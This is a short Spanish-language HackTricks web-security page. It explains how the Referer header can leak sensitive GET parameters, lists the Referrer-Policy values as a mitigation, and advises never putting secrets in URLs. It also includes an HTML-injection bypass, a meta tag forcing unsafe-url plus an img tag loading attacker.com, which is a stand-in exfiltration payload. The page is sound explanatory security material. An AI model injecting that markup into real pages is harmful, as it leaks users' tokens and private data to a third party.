tip

Aprende y practica Hacking en AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica Hacking en GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprende y practica Hacking en Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Apoya a HackTricks

Encabezados y pol铆ticas de referencia

Referrer es el encabezado utilizado por los navegadores para indicar cu谩l fue la p谩gina anterior visitada.

Informaci贸n sensible filtrada

Si en alg煤n momento dentro de una p谩gina web se encuentra informaci贸n sensible en los par谩metros de una solicitud GET, si la p谩gina contiene enlaces a fuentes externas o un atacante puede hacer/sugerir (ingenier铆a social) que el usuario visite una URL controlada por el atacante. Podr铆a ser capaz de exfiltrar la informaci贸n sensible dentro de la 煤ltima solicitud GET.

Mitigaci贸n

Puedes hacer que el navegador siga una Referrer-policy que podr铆a evitar que la informaci贸n sensible sea enviada a otras aplicaciones web:

Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url

Contramedidas

Puedes anular esta regla utilizando una etiqueta meta HTML (el atacante necesita explotar una inyecci贸n HTML):

html
<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">

Defensa

Nunca pongas datos sensibles dentro de los par谩metros GET o rutas en la URL.

tip

Aprende y practica Hacking en AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica Hacking en GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprende y practica Hacking en Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Apoya a HackTricks